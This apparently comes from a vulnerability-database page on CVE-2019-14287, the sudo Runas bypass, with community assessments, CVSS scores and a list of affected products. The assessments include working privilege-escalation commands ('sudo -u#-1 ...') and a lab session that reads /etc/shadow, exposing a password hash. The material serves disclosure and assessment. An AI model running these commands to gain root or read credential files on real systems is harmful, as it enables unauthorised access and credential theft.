Attacker Value
Low
(5 users assessed)
Exploitability
Very High
(5 users assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
1

CVE-2019-14287

Disclosure Date: October 17, 2019
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a “sudo -u #$((0xffffffff))” command.

Add Assessment

5
Ratings
Technical Analysis

Due to being almost 100% non-existent in the wild, this is only useful in CTF environments. The exploit is extremely easy to trigger, and I weep for the machine that has this configured in the wild.

4
Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Technical Analysis

I’ve seen Runas specifications on exactly two servers in the wild. I think it’s even rarer that you would specify ALL and !root in the same specification, though it is a better application of the principle of least privilege.

More importantly, privilege escalation is contingent on having access to a command that can escape to a shell or otherwise execute arbitrary code or commands. Cool bug, but the use case for this is minimized.

Here’s a contrived example of the bug in action:

vagrant@ubuntu-xenial:~$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL, !root) NOPASSWD: /usr/bin/whoami
vagrant@ubuntu-xenial:~$ sudo whoami
[sudo] password for vagrant:
Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
vagrant@ubuntu-xenial:~$ sudo -u ubuntu whoami
ubuntu
vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
root
vagrant@ubuntu-xenial:~$

You must specify # to use a UID.

Here’s another example where you’re not limited to a command, only the target users:

vagrant@ubuntu-xenial:~$ sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL, !root) NOPASSWD: ALL
vagrant@ubuntu-xenial:~$ sudo whoami
[sudo] password for vagrant:
Sorry, user vagrant is not allowed to execute '/usr/bin/whoami' as root on ubuntu-xenial.
vagrant@ubuntu-xenial:~$ sudo -u#-1 whoami
root
vagrant@ubuntu-xenial:~$ sudo -u#-1 cat /etc/shadow
root:*:17897:0:99999:7:::
daemon:*:17897:0:99999:7:::
bin:*:17897:0:99999:7:::
sys:*:17897:0:99999:7:::
sync:*:17897:0:99999:7:::
games:*:17897:0:99999:7:::
man:*:17897:0:99999:7:::
lp:*:17897:0:99999:7:::
mail:*:17897:0:99999:7:::
news:*:17897:0:99999:7:::
uucp:*:17897:0:99999:7:::
proxy:*:17897:0:99999:7:::
www-data:*:17897:0:99999:7:::
backup:*:17897:0:99999:7:::
list:*:17897:0:99999:7:::
irc:*:17897:0:99999:7:::
gnats:*:17897:0:99999:7:::
nobody:*:17897:0:99999:7:::
systemd-timesync:*:17897:0:99999:7:::
systemd-network:*:17897:0:99999:7:::
systemd-resolve:*:17897:0:99999:7:::
systemd-bus-proxy:*:17897:0:99999:7:::
syslog:*:17897:0:99999:7:::
_apt:*:17897:0:99999:7:::
lxd:*:17897:0:99999:7:::
messagebus:*:17897:0:99999:7:::
uuidd:*:17897:0:99999:7:::
dnsmasq:*:17897:0:99999:7:::
sshd:*:17897:0:99999:7:::
pollinate:*:17897:0:99999:7:::
vagrant:$6$pjYWAc.5$QYfO.wN80gnGe2kC1jYmSTGmO/qelG1CMl6ubKMbDQt9b1TEKZ648PQGI7VC88XE3ObdPBswUavsC1eDVZunJ.:17897:0:99999:7:::
ubuntu:!:18100:0:99999:7:::
vagrant@ubuntu-xenial:~$
3
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

Patch, but don’t freak out.

3
Ratings
Technical Analysis

As many others before me have stated, this CVE hold very little use other than in CTF environments.

To spot this vuln, look for a configuration similar to this one in the /etc/sudoers file:

<user> ALL=(ALL:!root) NOPASSWD: ALL

If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:

sudo -u#-1 <command>

You can also use the unsigned equivalent of -1: 4294967295.

To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass .

CVSS V3 Severity and Metrics
Base Score:
8.8 High
Impact Score:
5.9
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • canonical,
  • debian,
  • fedoraproject,
  • netapp,
  • opensuse,
  • redhat,
  • sudo project

Products

  • debian linux 10.0,
  • debian linux 8.0,
  • debian linux 9.0,
  • element software management node -,
  • enterprise linux 8.0,
  • enterprise linux desktop 6.0,
  • enterprise linux desktop 7.0,
  • enterprise linux eus 7.5,
  • enterprise linux eus 7.6,
  • enterprise linux eus 7.7,
  • enterprise linux eus 8.1,
  • enterprise linux eus 8.2,
  • enterprise linux eus 8.4,
  • enterprise linux server 5.0,
  • enterprise linux server 6.0,
  • enterprise linux server 7.0,
  • enterprise linux server aus 6.5,
  • enterprise linux server aus 6.6,
  • enterprise linux server aus 7.2,
  • enterprise linux server aus 7.3,
  • enterprise linux server aus 7.4,
  • enterprise linux server aus 7.6,
  • enterprise linux server aus 7.7,
  • enterprise linux server aus 8.2,
  • enterprise linux server aus 8.4,
  • enterprise linux server tus 7.2,
  • enterprise linux server tus 7.3,
  • enterprise linux server tus 7.4,
  • enterprise linux server tus 7.6,
  • enterprise linux server tus 7.7,
  • enterprise linux server tus 8.2,
  • enterprise linux server tus 8.4,
  • enterprise linux workstation 6.0,
  • enterprise linux workstation 7.0,
  • fedora 29,
  • fedora 30,
  • fedora 31,
  • leap 15.0,
  • leap 15.1,
  • openshift container platform 4.1,
  • sudo,
  • ubuntu linux 12.04,
  • ubuntu linux 14.04,
  • ubuntu linux 16.04,
  • ubuntu linux 18.04,
  • ubuntu linux 19.04,
  • virtualization 4.2

References

Advisory

Additional Info

Technical Analysis